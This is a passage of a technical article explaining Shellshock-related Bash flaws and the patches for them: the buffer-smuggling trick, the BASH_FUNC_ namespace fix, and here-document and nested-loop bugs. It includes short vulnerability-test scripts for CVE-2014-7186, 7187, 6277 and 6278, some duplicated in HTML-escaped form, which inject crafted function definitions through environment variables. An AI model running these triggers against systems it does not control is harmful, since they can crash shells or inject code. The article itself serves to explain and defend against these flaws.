#!/bin/bash

echo one \
two \
three

The parser does not execute echo right away but places it in the buffer, because the trailing backslash indicates that the expression will continue.

In our example, during environment analysis the buffer looks as follows:

function a a>\

The interpreter can only make sense of the part function a a (a nested function definition), and this is processed immediately. What remains in the buffer is:

>\

The purpose of leaving the sequence >\ behind is to influence how the next command (echo date) will be treated – because it, too, will end up in the buffer. Now, “contaminated” by the previous operation, the buffer will look like this:

>\
echo date

Note that after the backslash we have a newline character, which according to Bash syntax separates successive commands. Under normal circumstances it would be treated as a separator, but the smuggled backslash turns it into an escape sequence, nullifying the newline’s special meaning. As a result, the buffer contains an expression equivalent to:

>echo date

which is in turn the grammatical equivalent of:

date > echo

The result will therefore be the execution of date with its output redirected to a file named echo.

The next patch (bash43-026) eliminates this flaw by disabling, under certain conditions, the greedy buffering of incoming data (eol_ungetc_lookahead = 0;).

Name conflicts

The situation was well summarized on his blog by Michal Zalewski (lcamtuf) – a security researcher of Polish origin who also works with Google. He pointed out that the patches proposed so far were merely workarounds whose function was to prevent remote code execution (RCE) and did not solve the problem at its root.

In Zalewski’s view, besides the obvious tightening of the parser, a clear separation of functions and variables stored in the environment should also be introduced. The approach he proposed would involve allocating a separate namespace – that is, placing functions in the environment in such a way that they would never be confused with other information stored there, i.e., so that name conflicts would not occur.

Note that even with protections in the form of patches that disallow Bash command execution during environment reading, there remains a risk that an environment variable originating, say, from a web server could have the same label as a shell variable controlling the execution of a script or of an external command invoked by the shell.

Lcamtuf also suggested introducing a command-line option whose function would be to selectively enable the ability to export functions. Without the appropriate flag, such operations would be disallowed. A complication, however, was the need to maintain backward compatibility of the thus “hardened” interpreter – some scripts used by users and tools for testing distributed software packages make use of shell functions passed between processes.

The use of separate namespaces was introduced by a patch created by Florian Weimer of Red Hat: bash43-027. It defines a constant FUNCDEF_PREFIX containing the string "BASH_FUNC_" and then restricts the interpretation of environment-variable values as function definitions to those whose name begins with that string. It also adds a constant FUNCDEF_SUFFIX, set to a pair of parentheses, so that the name is also checked for ending with them.

Here is an example of exported functions present in the environment of a child process of Bash with the patch applied:

    BASH_FUNC_second_function()=() {  echo
    }
    BASH_FUNC_myfunction()=() {  echo
    }


    BASH_FUNC_second_function()=() {  echo
    }
    BASH_FUNC_myfunction()=() {  echo
    }

Parser-table problems

The aforementioned Weimer also reported in the meantime two fixes for bugs in the source file parse.y, which were independently discovered by Todd Sabin of VMware.

One of the flaws (CVE-2014-7187) manifested when multiple here-documents were attached to a single command. The result was an out-of-bounds array index error, leading to an interpreter crash.

The vulnerability can be tested by issuing the following command sequence:

1#!/bin/bash
2
3bash -c 'true <<EOF <<EOF <<EOF <<EOF \
4              <<EOF <<EOF <<EOF <<EOF <<EOF \
5              <<EOF <<EOF <<EOF <<EOF <<EOF' || \
6echo "Vulnerable to CVE-2014-7186"


#!/bin/bash

bash -c &#39;true &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF \
              &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF \
              &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF&#39; || \
echo &#34;Vulnerable to CVE-2014-7186&#34;

The second flaw (CVE-2014-7187) could be exploited using a large number of nested loops. The cause was similar – an out-of-bounds array access, but this time triggered by an off-by-one error.

Vulnerability can be tested by running the following script:

1#!/bin/bash
2
3(for x in {1..200} ; do echo "for x$x in ; do :"; done; \
4 for x in {1..200} ; do echo done ; done) | bash || \
5echo "Vulnerable to CVE-2014-7187"


#!/bin/bash

(for x in {1..200} ; do echo &#34;for x$x in ; do :&#34;; done; \
 for x in {1..200} ; do echo done ; done) | bash || \
echo &#34;Vulnerable to CVE-2014-7187&#34;

The patch, labelled bash43-028, eliminates these problems by introducing invocation counters.

Finale

On 1 October 2014, the already mentioned Michal Zalewski published details of Bash security flaws that he had until then kept secret (CVE-2014-6277 and CVE-2014-6278).

The first problem involved an uninitialized-pointer bug in the function make_redirect(), which handles the REDIR structure. It is a flaw similar to CVE-2014-7186, also exploiting here-document parser issues. Depending on Bash’s compilation flags, the vulnerability can be used either for denial-of-service attacks (causing an interpreter crash) or – under favourable conditions – for smuggling and executing arbitrary code via passed parameters and influencing local variable values.

Vulnerability can be tested using the following script:

1#!/bin/bash
2
3export X="() { x() { _; }; x() { _; } <<`perl -e'{print "A"x999}'`;}"
4bash -c exit || echo "Vulnerable to CVE-2014-6277"


#!/bin/bash

export X=&#34;() { x() { _; }; x() { _; } &lt;&lt;`perl -e&#39;{print &#34;A&#34;x999}&#39;`;}&#34;
bash -c exit || echo &#34;Vulnerable to CVE-2014-6277&#34;

The next bug, found by lcamtuf using a suite of custom “magic fuzzers”, involves an unintended alteration of the interpreter’s buffer through the use of a sequence of nested $ symbols. The problem most likely resides in the function xparse_dolparen() and in changes introduced in Bash 4.2 (patch level 12).

Vulnerability can be tested by running the following script:

1#!/bin/bash
2
3export X="() { _; } >_[$($())] { echo Vulnerable to CVE-2014-6278 ; }"
4bash -c exit


#!/bin/bash

export X=&#34;() { _; } &gt;_[$($())] { echo Vulnerable to CVE-2014-6278 ; }&#34;
bash -c exit

Patches and updates

Most GNU/Linux distributions have by now released appropriate patches and updates eliminating the problems described here. Somewhat behind is Apple, whose Mac OS X systems receive updates with a delay. Users speculate that this is probably a licensing issue: the new Bash is released under the terms of the GNU GPL version 3, which is more restrictive than GNU GPL version 2 – and it is the latter that Apple tries to stick with when including free-software packages in its systems.

As for the last two vulnerabilities, they are not yet fully closed (in Bash 4.3 patch level 27), but Weimer’s patches protect against their exploitation.

Introduction

Unix

The shell

Program and process

Inter-process communication

The process environment

Environment variables

The environment in Bash

Variables and functions

Exported variables

Environmental functions

Automatic function definition

Imperfections

The Shellshock vulnerability

Example of a vulnerable web server

The first patch

The buffer flaw

Name conflicts

Parser-table problems

Finale

Patches and updates

Taxonomies: